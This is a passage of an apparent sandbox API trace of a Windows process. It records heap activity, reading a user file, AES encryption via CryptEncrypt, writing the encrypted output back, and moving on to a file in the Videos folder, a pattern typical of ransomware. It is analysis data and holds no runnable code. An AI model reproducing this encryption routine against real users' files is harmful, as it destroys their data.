(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0105.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0105.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0105.208] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0105.208] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xca0e, lpOverlapped=0x0) returned 1 [0105.210] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0105.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca0e) returned 0x4516010 [0105.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0105.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca0e) returned 0x4522a28 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.214] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca0e) returned 0x4516010 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.214] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0105.215] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0105.215] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0105.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0105.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29c0 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca0e) returned 0x4516010 [0105.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0105.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xca0e) returned 0x452f440 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.217] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.217] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.218] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0620 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0288 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0105.219] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2c80, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c80*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0105.219] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.219] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.219] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb018, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.220] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xca0e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xca10) returned 1 [0105.220] CharLowerBuffW (in: lpsz="byte[51729]", cchLength=0xb | out: lpsz="byte[51729]") returned 0xb [0105.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.220] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453be58*, pdwDataLen=0x144de30*=0xca0e, dwBufLen=0xca10 | out: pbData=0x453be58*, pdwDataLen=0x144de30*=0xca10) returned 1 [0105.220] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.221] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xca10, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144e834*=0xca10, lpOverlapped=0x0) returned 1 [0105.223] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0105.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.223] CryptDestroyKey (hKey=0x41ac140) returned 1 [0105.223] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.223] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.223] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.223] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.223] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.224] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.224] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.224] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0105.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.224] FreeLibrary (hLibModule=0x756e0000) returned 1 [0105.224] CloseHandle (hObject=0x298) returned 1 [0105.224] CloseHandle (hObject=0x258) returned 1 [0105.230] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4", lpFilePart=0x0) returned 0x57 [0105.230] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\38vodg.mp4")) returned 0x20 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0105.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0105.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0105.231] RtlAllocateHeap 